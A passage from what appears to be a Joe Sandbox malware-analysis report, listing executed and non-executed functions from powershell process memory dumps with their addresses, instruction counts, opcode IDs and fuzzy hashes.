                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 309c2a299a52827be969d27ba477e491cdd19c258d5871f589b24a2bfd89c05b
                                                    • Instruction ID: 7212a1c8be8b21cb1339a94734c8e051ea20d76daf08b2923176cec3a8dbf78c
                                                    • Opcode Fuzzy Hash: 309c2a299a52827be969d27ba477e491cdd19c258d5871f589b24a2bfd89c05b
                                                    • Instruction Fuzzy Hash: 1D21483090DB4C4FDB18DFACD84A7E97BF0EB56321F00426BD049C3192DA74A446CB92
                                                    Function 00007FFD9B76EC61 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1859440965.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b76d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91cdb3994e24d855170f7ef31b8becb85fecf63c48c8d91a547674ec607b8dc7
                                                    • Instruction ID: d7334c80494864ae9fca069a06c8e55e9590805d996fe945ab95d70471bc49b1
                                                    • Opcode Fuzzy Hash: 91cdb3994e24d855170f7ef31b8becb85fecf63c48c8d91a547674ec607b8dc7
                                                    • Instruction Fuzzy Hash: 91112E7150DF088FE7A8DF2DE48596677E0FB98321B11066FD449C7266D731E881CB92
                                                    Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                    Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
                                                    • Instruction ID: bf0ba1b241cb973b33a6e65a60b75d992b145ff148f1e26bfd8c7c5e39fbac5a
                                                    • Opcode Fuzzy Hash: e2e3b372c87a265d1de846e8904a210eacdfe6ebba2c2771f95adc5666777b65
                                                    • Instruction Fuzzy Hash: 0CF0E932B4D5094FD7A8EB9CE4519E473E0EF65320B1500BAE06DC71B7CA25EC40C741
                                                    Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
                                                    • Instruction ID: 35c7e5b8e5a23de32d8f3e95b4894f616edace00bfde92fd7aeda5bfaeb16123
                                                    • Opcode Fuzzy Hash: 07ea2650f15046fe3328d01e824162d753f1a85d63245fc9311fc687fb612a9b
                                                    • Instruction Fuzzy Hash: FBF0BE32A8E5498FD7A8EA9CE0609A873E0FF0532070600BAE05DCB1A7CA25BC80C740
                                                    Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1861181441.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                    Function 00007FFD9B88A2CA Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                    • Instruction ID: 2bd4b7452e8ca639556a101ba233e37e207cd3d88c8fb42445df63553e6ec566
                                                    • Opcode Fuzzy Hash: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                    • Instruction Fuzzy Hash: B1E01A35909A4D8FCB55EF18C85A8E97BA0FF68201B01429BE81DC7161EB719A58CBC2

                                                    Non-executed Functions

                                                    Function 00007FFD9B888BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^4$N_^5$N_^@$N_^N$N_^U$N_^Y
                                                    • API String ID: 0-3838031992
                                                    • Opcode ID: a392f3302fbb25d507c61bbea77a140a6f0c9d6f9604de596c2796eb31889d56
                                                    • Instruction ID: 83bbf1f93b7a629c3e76d53dd781bb15c7523474e495e31b860c6ae041f0fd07
                                                    • Opcode Fuzzy Hash: a392f3302fbb25d507c61bbea77a140a6f0c9d6f9604de596c2796eb31889d56
                                                    • Instruction Fuzzy Hash: 3931E2A7B089364B831A76BCBD656E86744DF9437A34502F7D3A9CF193DC24608B87C2
                                                    Function 00007FFD9B8889F2 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1860274412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^$N_^$N_^$N_^$N_^
                                                    • API String ID: 0-1162251571
                                                    • Opcode ID: 146d961eed70f51233c92ac6a838d5b8f472c8829c5e64ad5657f8ba79b138b9
                                                    • Instruction ID: 7434351049173d53d9ce47226c1e13a6a9b08405790388154a102f990bd31ab8
                                                    • Opcode Fuzzy Hash: 146d961eed70f51233c92ac6a838d5b8f472c8829c5e64ad5657f8ba79b138b9
                                                    • Instruction Fuzzy Hash: FE5173A2E0FAD75BF76647A94CB54946FA0EF1669470E02F3C1F98B0E3ED2429034243

                                                    Executed Functions

                                                    Function 00007FFD9B88644D Relevance: .7, Instructions: 709COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6337f3cb908f5669fd4e0d68e41bf719897082e57cffa7a952616eea766cbc40
                                                    • Instruction ID: bfada23473d55a737df4c3853e9bbfb7f1e303345ad20cd1da6ffd5fb0f50930
                                                    • Opcode Fuzzy Hash: 6337f3cb908f5669fd4e0d68e41bf719897082e57cffa7a952616eea766cbc40
                                                    • Instruction Fuzzy Hash: 33D18070A08A4D8FDF99DF58C455AA9BBE1FF68300F15426AD41DD72A5CB34E881CBC1
                                                    Function 00007FFD9B956605 Relevance: .4, Instructions: 435COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9047dd271a9ca5413dad235c878a86d1ca3bdc0e250e37b45801e092311a0f88
                                                    • Instruction ID: 83071842fab17f5ed80ff5e8854200b8186a7bbead01dc9872dad61d972285b3
                                                    • Opcode Fuzzy Hash: 9047dd271a9ca5413dad235c878a86d1ca3bdc0e250e37b45801e092311a0f88
                                                    • Instruction Fuzzy Hash: 89D15672B1FBCD1FEBA597A858645B57BA1EF52314B0901FED89DC70E3DA18A801C341
                                                    Function 00007FFD9B88A0D3 Relevance: .3, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05faeb172e242b9ac57c815315d28e821ac041adc7628084584d23d6c10b3405
                                                    • Instruction ID: 3751d91d22f55a81ac77eda1d7482f1bc1327666ed2898235e3ed00ddd650130
                                                    • Opcode Fuzzy Hash: 05faeb172e242b9ac57c815315d28e821ac041adc7628084584d23d6c10b3405
                                                    • Instruction Fuzzy Hash: E111D36690EBCD4FD7639B2888291947FB0EF26210B0A00FBD498CB0F3D92859088392
                                                    Function 00007FFD9B889D38 Relevance: .2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be92401c84b4b61d0e9885a14d7294486e9cb09ef06f363ad356d3130b72901c
                                                    • Instruction ID: b6604fdbd6631c066408eec5ce522fc99fe0cf6a50f7cdad489ca5a6ba7fe7a9
                                                    • Opcode Fuzzy Hash: be92401c84b4b61d0e9885a14d7294486e9cb09ef06f363ad356d3130b72901c
                                                    • Instruction Fuzzy Hash: E1F0E275808A8C4FDB61DF1888191A47FE0FF29301B0101ABE40DC71A1EB74D914C782
                                                    Function 00007FFD9B954073 Relevance: .2, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9ea7859f8df7750894c43586c2e9a0db30df8b43a3cbe4b8a6d95986341eb43d
                                                    • Instruction ID: 2653f8b4ea84a39e7fc71fc07ed8a02b2cdf188f1b32d0b6c34dfdf0b37affcb
                                                    • Opcode Fuzzy Hash: 9ea7859f8df7750894c43586c2e9a0db30df8b43a3cbe4b8a6d95986341eb43d
                                                    • Instruction Fuzzy Hash: D5516C32B5EA4A1FE7E9C6AC542167477D1DF65210F1940BEC45DC72EBDE14EC058341
                                                    Function 00007FFD9B954370 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 913a3c641de1e10b8a2f80e83a9a606f7ccd2daa5293500e759638a4e6608136
                                                    • Instruction ID: 80fc93134f3d9f405b2a4d329c5a19875d99157db108bc8afef4188fe36c5306
                                                    • Opcode Fuzzy Hash: 913a3c641de1e10b8a2f80e83a9a606f7ccd2daa5293500e759638a4e6608136
                                                    • Instruction Fuzzy Hash: 4F414932B5EA495FEBE9DAAC54306B477D1EF40720B0900BED45DC72ABEA64BD018381
                                                    Function 00007FFD9B889758 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3cc96412a3a67130efd15da709c4b8741d5b0a787f7a7203bd9b0ec81ce9683
                                                    • Instruction ID: 47cbea213db54878c2268118c9848fe6c69aebb1fb44307d1475dfc954b5707a
                                                    • Opcode Fuzzy Hash: b3cc96412a3a67130efd15da709c4b8741d5b0a787f7a7203bd9b0ec81ce9683
                                                    • Instruction Fuzzy Hash: 8C310971A1DF4C8FDB589F5CA84A6A97BE0FB99310F00412FE459D3252DA70B855CBC2
                                                    Function 00007FFD9B76E7E1 Relevance: .1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2023101383.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b76d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67f725f9020e2538a7647f013201f3707874916675d577a8b5ed2d052e272fb2
                                                    • Instruction ID: 52a1e68d9544cd53745480f29d7ce6f1c72ea2d61e758ffdc488859f8168c9a6
                                                    • Opcode Fuzzy Hash: 67f725f9020e2538a7647f013201f3707874916675d577a8b5ed2d052e272fb2
                                                    • Instruction Fuzzy Hash: 1641287040EBC48FE7569B3998559523FF0EF56220B1606EFD088CB1B3D629A846C7A3
                                                    Function 00007FFD9B9540BF Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0346c93ef32b88747172b233935408e21b8a4bcca5caec257584b5dfba685a53
                                                    • Instruction ID: 1bcf4fb34089567392b52694da7a66c35b7ed7da045fa0a64a794d425d25b468
                                                    • Opcode Fuzzy Hash: 0346c93ef32b88747172b233935408e21b8a4bcca5caec257584b5dfba685a53
                                                    • Instruction Fuzzy Hash: 4021F622B6F98A2FE7F9CA98446227467C1EF71210B5A40BDD85DC72FACE14EC048341
                                                    Function 00007FFD9B88A62C Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf231c0704d1450deb44d7c24cdb19c97913708483359930b386e5c0db91a23d
                                                    • Instruction ID: d9f04957864981a37d98ce0e39a7a11c31072ea978200924c66ff838e5393ce9
                                                    • Opcode Fuzzy Hash: bf231c0704d1450deb44d7c24cdb19c97913708483359930b386e5c0db91a23d
                                                    • Instruction Fuzzy Hash: 0921063090DB4C8FDB59DBAC984A6E97BE0EB96321F04416BD048C31A6DA74A406CB92
                                                    Function 00007FFD9B9543BC Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2025550023.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b950000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 292dc38a073d4dc8f76923a8b44134891d4c9b7fefb2f0494bbc186130521eb3
                                                    • Instruction ID: 4b3c0864fa7f932afe5f8dd7fdabfbe25325def8b192096fa4ce55ede3abf9e6
                                                    • Opcode Fuzzy Hash: 292dc38a073d4dc8f76923a8b44134891d4c9b7fefb2f0494bbc186130521eb3
                                                    • Instruction Fuzzy Hash: 68110632B9F5895FE7F4DB98947467877D0EF4021074A00BED85DC72BADA69BC008341
                                                    Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

                                                    Non-executed Functions

                                                    Function 00007FFD9B888995 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^$N_^$N_^$N_^
                                                    • API String ID: 0-3900292545
                                                    • Opcode ID: 7fe091fc42f9defadceeeb4ec95ac9c1c1840ad96cba640769eef50481e89f1a
                                                    • Instruction ID: eaa362a5be4eae2c1b7a6c0159425dd4597290c045f2352f81b9c9184ef573b5
                                                    • Opcode Fuzzy Hash: 7fe091fc42f9defadceeeb4ec95ac9c1c1840ad96cba640769eef50481e89f1a
                                                    • Instruction Fuzzy Hash: 934184A3A0FAD65FE76647698C750957FA0EF1626470A02F7C1E48B0E3ED28250B8353
                                                    Function 00007FFD9B888BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2024346686.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffd9b880000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^4$N_^7$N_^F$N_^J
                                                    • API String ID: 0-3508309026
                                                    • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                    • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                    • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                    • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

                                                    Executed Functions

                                                    Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: X7)!
                                                    • API String ID: 0-116819185
                                                    • Opcode ID: 82e34b616c2070d8460f758bbbbea860ee7603934c1d2e9d26db24d91acfc082
                                                    • Instruction ID: 3501a9b12acb07052ddedb87129f41798ffed64be801d7fafea1e723c924ec95
                                                    • Opcode Fuzzy Hash: 82e34b616c2070d8460f758bbbbea860ee7603934c1d2e9d26db24d91acfc082
                                                    • Instruction Fuzzy Hash: 9FD14532A1FBCD9FEBA5A7A858645B57BE1EF56210B0901FED48CC70E3DA18A905C341
                                                    Function 00007FFD9B89A0E0 Relevance: .3, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f24a0c8fa8dbd59725d7d0afba24db829a201d20c535a9c18b573a44c41164f
                                                    • Instruction ID: 3e4a6a4741e827b7307e2e13f554a7f913cf109b9aecd3087a7c777018b6c3de
                                                    • Opcode Fuzzy Hash: 7f24a0c8fa8dbd59725d7d0afba24db829a201d20c535a9c18b573a44c41164f
                                                    • Instruction Fuzzy Hash: C5216D6A90FBD94FC7179B385C790D47FB0EE1721470A01E7D089CB0B3D91959498792
                                                    Function 00007FFD9B899D4B Relevance: .2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 74657e8321a3025c48d955144bff510b06f3e04efbba8b06da34d83be07a262a
                                                    • Instruction ID: 1516c7993185fb5bda34851451930ad45a202a3b1a318f4d3c44a08286974ba9
                                                    • Opcode Fuzzy Hash: 74657e8321a3025c48d955144bff510b06f3e04efbba8b06da34d83be07a262a
                                                    • Instruction Fuzzy Hash: E5F0C87590D6CDCFDB529F5848291E47FE0FF2A200B0501EBD449C7071DA249A54C782
                                                    Function 00007FFD9B964073 Relevance: .2, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc75d07d87874de7a555064ad420f300917556ad6f998aed24817a0670e1ecbc
                                                    • Instruction ID: a39876ca7717fbb04ad3a4afe01d3a168ec14f35ab36195ab47d9ed3b0934179
                                                    • Opcode Fuzzy Hash: bc75d07d87874de7a555064ad420f300917556ad6f998aed24817a0670e1ecbc
                                                    • Instruction Fuzzy Hash: 46515A32F1EA4A9FEBA9DA9C542267477D1EFA5220B1A40BFC05DC72E7DE14EC058341
                                                    Function 00007FFD9B964370 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d583de327159a6f47a76ecf205f3e026d51a1739292a8a28a209b18297325769
                                                    • Instruction ID: 89c77e460ec02c5fb0f8b031b2f2090177bf2a326ffe1bd0e9178cf833281e17
                                                    • Opcode Fuzzy Hash: d583de327159a6f47a76ecf205f3e026d51a1739292a8a28a209b18297325769
                                                    • Instruction Fuzzy Hash: 25413932B1EA499FEBB9D6AC5431AB477D1EF40720B0901BFD05DC72A7EA15AD018381
                                                    Function 00007FFD9B899750 Relevance: .1, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b81abc87f6dcd15b8ff17ccbd1fbfd4f4a2d889658d9446c5933593508b7085
                                                    • Instruction ID: 68665cc5a9281e24f9dfe1583605e4d2554fc5b024ac84a86a11874b23161ce2
                                                    • Opcode Fuzzy Hash: 6b81abc87f6dcd15b8ff17ccbd1fbfd4f4a2d889658d9446c5933593508b7085
                                                    • Instruction Fuzzy Hash: 1041267190EB889FDB19DF5C9C0A6A97FE0EB59310F04416FD099D3293CA24B915CBC2
                                                    Function 00007FFD9B77ED40 Relevance: .1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2230467712.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5f7e0668d011251f5315b08cd7147c0c2b50c6b4b07a77405f4e7972c09c6d5
                                                    • Instruction ID: 391230bec96ab6f6e9cbd8e3ba00ee9c950b03e6882741fe07a1e164d4c7428e
                                                    • Opcode Fuzzy Hash: b5f7e0668d011251f5315b08cd7147c0c2b50c6b4b07a77405f4e7972c09c6d5
                                                    • Instruction Fuzzy Hash: 2D41177150EBC44FE766DB2898919523FF4EF57320B1A06DFD088CB1B3D629A846C792
                                                    Function 00007FFD9B89A64C Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b3d8a446e1513338aec5d8b77172002047c28fe5707f82f8f044c7fa732ec12b
                                                    • Instruction ID: 43b4bf2f604c955364b9f60e4461e953fc64ed2c3fb7e752213f67102fdd90d1
                                                    • Opcode Fuzzy Hash: b3d8a446e1513338aec5d8b77172002047c28fe5707f82f8f044c7fa732ec12b
